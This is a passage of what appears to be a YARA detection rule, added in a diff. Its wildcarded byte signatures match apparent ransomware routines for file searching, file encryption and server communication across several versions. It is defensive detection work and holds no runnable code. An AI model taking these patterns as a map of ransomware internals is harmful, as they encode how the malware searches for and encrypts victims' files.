?? 57 52 E8 10 FE FF FF 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? E9 E7 00 00 00 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 79 8D 54 + 24 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 7F 00 00 00 8D 44 24 ?? 50 E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 63 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 75 47 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 35 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB 23 8D + 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 10 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 + ?? 50 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? 0F 84 7D FD FF FF 55 FF 15 ?? ?? ?? ?? 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D + 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $file_search_0_3_5a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D + 84 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A + ?? 51 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? + 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 0F 84 91 03 00 00 8B 9C 24 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 84 73 02 00 00 8D 4C + 24 ?? B8 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 + 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 23 03 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 1E + 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E3 + 02 00 00 55 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C5 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 + C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 + 24 ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 + 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 + C0 0F 84 3F 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? + 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 00 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 + } + $file_search_0_3_5a_2 = { + 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 + 1B C0 83 D8 ?? 85 C0 0F 84 C1 01 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B + 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 82 01 00 00 8D 8C 24 ?? + ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 + 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 43 01 00 00 8D 8C 24 ?? ?? ?? ?? 53 51 E8 0F FD FF FF 8D 94 24 ?? ?? ?? ?? + 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ED 00 00 00 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 + 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 8D 44 24 ?? 0F 84 79 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 ?? + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 78 00 00 00 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 59 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 3A 8D 7C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 2C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 1E 68 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 0C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 8D 4C 24 ?? 51 57 FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 7D FC FF FF 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_file_0_2_6a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? + ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 + 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A + ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 1A 57 56 + FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 89 7C 24 ?? 75 21 56 FF 15 ?? ?? ?? ?? 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? + ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 81 FF ?? ?? ?? ?? 77 D7 53 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? + ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B D7 83 E2 ?? BB ?? ?? ?? ?? 2B DA 89 8C 24 + } + $encrypt_file_0_2_6a_2 = { + 8B 8C 24 ?? ?? ?? ?? 03 FB 57 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 74 3C + 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 55 56 FF 15 ?? ?? ?? ?? 85 C0 74 24 8B 44 24 ?? 3B 44 24 ?? 75 1A 53 8D 14 28 53 52 + E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 0F 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 D5 00 00 00 8D 44 24 ?? 50 + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 57 53 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? + 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A ?? + 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 57 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 8D + 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 0F 56 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 + ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 55 11 05 ?? ?? ?? ?? 01 3D ?? ?? ?? ?? 11 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? + 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_file_0_3_1 = { + 53 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 + ?? ?? ?? ?? 8B D5 83 E2 ?? BF ?? ?? ?? ?? 2B FA 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 1C 2F 53 89 84 24 ?? ?? ?? + ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 89 44 24 ?? 74 38 6A ?? 8D 4C 24 ?? 51 55 50 56 FF 15 ?? ?? ?? ?? + 85 C0 74 24 3B 6C 24 ?? 75 1E 57 57 8B 7C 24 ?? 8D 14 2F 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 75 0F + 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 0F 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? + ?? ?? 52 53 55 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 + 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF D7 6A ?? 8D 54 24 ?? 52 6A ?? 8D 44 24 ?? 50 56 FF D7 6A ?? 8D 4C 24 ?? 51 53 55 56 + FF D7 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 8D 9B ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 + ?? ?? ?? ?? 85 C0 75 27 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? FF D7 83 + C6 ?? 83 FE ?? 7C C0 A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? + ?? ?? ?? ?? 8B 44 24 ?? 50 11 35 ?? ?? ?? ?? 01 1D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 + ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5B 5D 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_file_0_3_3_1 = { + 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 94 24 + ?? ?? ?? ?? 8B D3 83 E2 ?? BD ?? ?? ?? ?? 2B EA 89 84 24 ?? ?? ?? ?? 8D 04 2B 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? + 50 89 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D 44 24 ?? 50 53 57 56 + FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 5C 24 ?? 75 1E + 55 8D 0C 1F 55 51 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 + FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5C 01 00 00 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? + ?? 51 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A + ?? 8D 84 24 ?? ?? ?? ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 56 C7 + 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 + 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AB 00 00 00 56 FF 15 ?? ?? ?? ?? 56 FF + } + $encrypt_file_0_3_3_2 = { + 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 49 ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 + 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE + ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? + 8B 44 24 ?? 57 11 35 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? + ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_file_0_3_4a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? + ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 + 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A + ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 19 5F 0B C0 + 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 57 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 08 81 FB + ?? ?? ?? ?? 76 22 56 FF 15 ?? ?? ?? ?? 5B 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B + C3 83 E0 ?? BD ?? ?? ?? ?? 2B E8 8D 04 2B 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D + 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 99 01 00 + } + $encrypt_file_0_3_4a_2 = { + 00 3B 5C 24 ?? 75 1E 55 8D 14 1F 55 52 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? + ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5D 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? + 51 8D 94 24 ?? ?? ?? ?? 52 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A + ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 54 24 ?? 52 6A ?? + 8D 44 24 ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 54 24 ?? 6A ?? 8D 4C 24 ?? 51 52 53 56 C7 44 24 ?? ?? ?? + ?? ?? FF D5 85 C0 75 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AC 00 00 00 56 FF + 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 64 24 ?? 8B 4C 24 ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 51 FF + 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? + ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_file_0_3_5a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 33 C0 55 56 57 33 FF 68 ?? ?? ?? ?? 89 84 24 + ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? + 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 8B F1 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A + ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 D2 00 00 + 00 57 56 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B8 00 00 00 3B EF 0F 84 B0 00 00 00 81 FD ?? ?? ?? ?? 0F 87 A4 00 00 00 + 8D 4F ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 8C 24 ?? + ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B CD 83 E1 ?? BB ?? ?? ?? ?? 2B D9 89 84 24 ?? ?? ?? ?? 8D 04 2B 50 + 89 94 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 3B 6A ?? 8D 54 24 ?? 52 55 57 56 FF 15 ?? ?? ?? + ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 6C 24 ?? 74 18 57 E8 + } + $encrypt_file_0_3_5a_2 = { + 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 7A 01 00 00 53 8D 04 2F 53 50 E8 ?? ?? ?? ?? 8B 6C 24 ?? 83 C4 ?? 55 E8 ?? + ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 C7 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 + 55 57 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 6A ?? + 8D 94 24 ?? ?? ?? ?? 52 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 0F 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E9 5E FF FF FF 6A ?? + 8D 44 24 ?? 50 6A ?? 8D 4C 24 ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 D4 8B 44 24 ?? 6A ?? 8D 54 24 ?? 52 50 53 + 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 B8 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 EB 09 8D + A4 24 ?? ?? ?? ?? 8B FF 8B 54 24 ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D + ?? ?? ?? ?? 75 0E 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? + 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? + ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 + ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $server_communication_0_2_6a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 00 53 33 DB 39 1D ?? ?? + ?? ?? A3 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 53 50 88 5C 24 ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 53 89 44 24 ?? 89 44 + 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? + ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 + 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 50 68 ?? ?? ?? 